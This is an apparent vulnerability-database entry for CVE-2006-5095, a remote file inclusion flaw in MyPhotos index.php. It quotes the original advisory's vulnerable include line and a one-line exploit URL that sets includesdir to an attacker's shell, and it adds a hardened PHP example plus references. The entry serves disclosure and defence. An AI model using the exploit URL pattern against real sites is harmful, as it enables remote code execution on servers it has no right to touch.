MyPhotos 'index.php' PHP Remote File Inclusion Vulnerability

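Vulnerability ID: 1193338    Vulnerability type: Unknown
Published: 2006-09-29    Updated: 2006-10-19
CVE ID: CVE-2006-5095    CNNVD-ID: CNNVD-200609-549
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006100022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-549
|Vulnerability details
A PHP remote file inclusion vulnerability exists in index.php of MyPhotos. A remote attacker can execute arbitrary PHP code via the includesdir parameter.
|Exploit (EXP)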
************************************************************************
***              PerSiaNFoX DigitaL SecuritY TeaM                    ***
************************************************************************

<# MyPhotos<= ( Remote File Include Vulnerability

<# Script.............. :MyPhotos

<#Download.....:http://jaist.dl.sourceforge.net/sourceforge/myphotos/myphotos-0.1.3b-beta.zip

<# Discovered By.... : Root3r_H3ll

<# Location .......... : Iran

<# Class..............  : Remote

<# Original Advisory : http://Www.PersainFox.com

<# We ArE : Root3r_H3LL , Arash.RJ

<# Special TNX HB Team , All My Friends

------------------------------------------------------------------------

< # Code :

include ("$includesdir/indextext.inc.php");

< # Exploit :

Www.Site.coM/[path]/index.php?includesdir=Sh3ll
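
The include pattern quoted in the advisory, next to a hardened form. This is an added example, not MyPhotos code and not from the advisory's authors; `INCLUDES_DIR`, `ALLOWED_INCLUDES` and `resolve_include()` are hypothetical names, and it assumes the include directory sits beside the script and that `$includesdir` can be populated from the query string, as the advisory's URL implies.

```php
<?php
// Added illustration, not MyPhotos source. All names below are hypothetical.

// Pattern quoted in the advisory: the directory comes from a variable that
// a request parameter can set, so the include target is caller-controlled.
//   include ("$includesdir/indextext.inc.php");

// Hardened form: the directory is a server-side constant, never request data.
define('INCLUDES_DIR', __DIR__ . '/includes');

// Files this page is allowed to pull in (assumed list for the example).
const ALLOWED_INCLUDES = ['indextext.inc.php'];

function resolve_include(string $name): string
{
    // Allowlist check first: only known file names are accepted.
    if (!in_array($name, ALLOWED_INCLUDES, true)) {
        throw new RuntimeException("include not allowed: $name");
    }
    // realpath() collapses ../ and symlinks and returns false for anything
    // that does not exist on the local filesystem, URL-style values included.
    $base = realpath(INCLUDES_DIR);
    $path = realpath(INCLUDES_DIR . '/' . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("include outside INCLUDES_DIR: $name");
    }
    return $path;
}

// Ignore any request-supplied includesdir; log the attempt (without echoing
// the supplied value) so probing of this parameter is visible to defenders.
if (isset($_REQUEST['includesdir'])) {
    error_log('ignored includesdir parameter from ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
}

try {
    require resolve_include('indextext.inc.php');
} catch (RuntimeException $e) {
    http_response_code(500);
    error_log($e->getMessage());
}
```

As defence in depth, `allow_url_include = Off` in php.ini stops `include`/`require` from accepting URL targets on PHP versions that support the directive.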
|References

Source: BUGTRAQ
Name: 20060923 MyPhotos<= Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/446876/100/0/threaded
Source: VIM
Name: 20060927 MyPhotos includesdir file inclusion - CVE dispute
Link: http://attrition.org/pipermail/vim/2006-September/001057.html
Source: BID
Name: 20160
Link: http://www.securityfocus.com/bid/20160
Source: SREASON
Name: 1656
Link: http://securityreason.com/securityalert/1656